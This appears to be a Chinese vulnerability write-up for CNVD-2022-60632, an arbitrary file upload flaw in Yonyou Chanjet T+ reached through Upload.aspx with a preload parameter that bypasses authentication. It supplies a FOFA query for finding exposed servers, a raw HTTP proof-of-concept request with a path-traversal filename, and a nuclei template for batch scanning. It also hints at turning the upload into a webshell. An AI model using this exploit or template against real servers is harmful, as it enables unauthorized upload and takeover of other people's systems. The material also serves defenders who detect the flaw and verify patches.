用友畅捷通T+ Upload.aspx任意文件上传漏洞CNVD-2022-60632
漏洞描述
用友 畅捷通T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证进行文件上传,控制服务器
漏洞影响
用友 畅捷通T+
漏洞复现
fofa语法:app="畅捷通-TPlus"
登录页面如下:
上传文件类型验证不完善,可上传任意文件到服务器中的任意位置,验证POC
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 261
User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; ko-KR) AppleWebKit/535.16.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.16.4
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXR9biLu
Connection: close
------WebKitFormBoundaryVXR9biLu
Content-Disposition: form-data; name="File1";filename="../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/1.txt"
Content-Type: image/jpeg
1
------WebKitFormBoundaryVXR9biLu--
由于应用为预编译的,直接上传的 aspx木马
无法直接利用,需要通过上传 dll 与 compiled
文件后利用Webshell
后续利用请自行搜索
nuclei批量yaml文件
id: yonyou_changjietong_upload_rce
info:
name: yonyou_changjietong_upload_rce
author: afan
severity: high
tags: yonyou,changjietong,bjxsec,yonyouoa
description: fofa app="畅捷通-TPlus"
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
file_content: "{{to_lower(rand_text_alpha(26))}}"
requests:
- raw:
- |
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: {{Hostname}}
Content-Length: 196
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysHT4cEvOAWALSZEv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarysHT4cEvOAWALSZEv
Content-Disposition: form-data; name="File1"; filename="../{{file_name}}"
Content-Type: image/jpeg
{{file_content}}
------WebKitFormBoundarysHT4cEvOAWALSZEv--
- |
GET /tplus/SM/SetupAccount/{{file_name}} HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: word
words:
- "{{file_content}}"
part: body